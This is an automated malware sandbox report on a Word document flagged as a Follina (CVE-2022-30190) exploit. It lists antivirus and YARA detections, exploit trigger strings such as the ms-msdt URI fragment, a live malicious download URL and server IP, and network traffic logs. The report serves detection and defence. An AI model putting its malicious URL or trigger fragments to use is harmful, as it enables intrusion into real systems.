Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MuUeMZphCk.docx

Overview

General Information

Sample Name:MuUeMZphCk.docx
Analysis ID:794514
MD5:cda4155d33b715f31315a9247d56ed3d
SHA1:7a495ae1b4c9132d0afb9b058e049cc71c5a5a55
SHA256:62243a041c28b5f98f0d29780250bf83e61a85523ddce855745f94d381006615
Tags:CVE-2022-30190docx
Infos:

Detection

Follina CVE-2022-30190
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 764 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x2c1:$a2: TargetMode="External"
  • 0x2b9:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x26e:$olerel: relationships/oleObject
  • 0x287:$target1: Target="http
  • 0x2c1:$mode: TargetMode="External

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x16ad:$a: PCWDiagnostic
  • 0x16a1:$sa3: ms-msdt
  • 0x1701:$sb3: IT_BrowseForFile=
sslproxydump.pcapEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
  • 0x1690:$re1: location.href = "ms-msdt:
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x729:$a: PCWDiagnostic
    • 0x71d:$sa3: ms-msdt
    • 0x77d:$sb3: IT_BrowseForFile=
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x70c:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x729:$a: PCWDiagnostic
      • 0x71d:$sa3: ms-msdt
      • 0x77d:$sb3: IT_BrowseForFile=
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x70c:$re1: location.href = "ms-msdt:
      Click to see the 4 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:195.201.110.47192.168.2.22443491762036726 01/30/23-16:38:59.237228
      SID:2036726
      Source Port:443
      Destination Port:49176
      Protocol:TCP
      Classtype:Attempted User Privilege Gain

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: MuUeMZphCk.docxAvira: detected
      Multi AV Scanner detection for submitted file
      Source: MuUeMZphCk.docxReversingLabs: Detection: 46%
      Source: MuUeMZphCk.docxVirustotal: Detection: 50%Perma Link
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G

      Exploits

      barindex
      Yara detected Microsoft Office Exploit Follina CVE-2022-30190
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, type: DROPPED
      Detected suspicious Microsoft Office reference URL
      Source: document.xml.relsExtracted files from sample: http://baza-novostei.name/dir/info/priny/t.html!
      Source: unknownHTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49175 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49178 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: unknownHTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49176 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 195.201.110.47:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 195.201.110.47:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficDNS query: name: baza-novostei.name
      Source: global trafficDNS query: name: baza-novostei.name
      Source: global trafficDNS query: name: baza-novostei.name
      Source: global trafficDNS query: name: baza-novostei.name
      Source: global trafficDNS query: name: baza-novostei.name
      Source: global trafficDNS query: name: baza-novostei.name
      Source: global trafficDNS query: name: baza-novostei.name
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 195.201.110.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.201.110.47:80

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 195.201.110.47:443 -> 192.168.2.22:49176
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-AliveIf-Modified-Since: Sun, 29 Jan 2023 13:29:26 GMTIf-None-Match: "63d674b6-18c0"
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-Alive
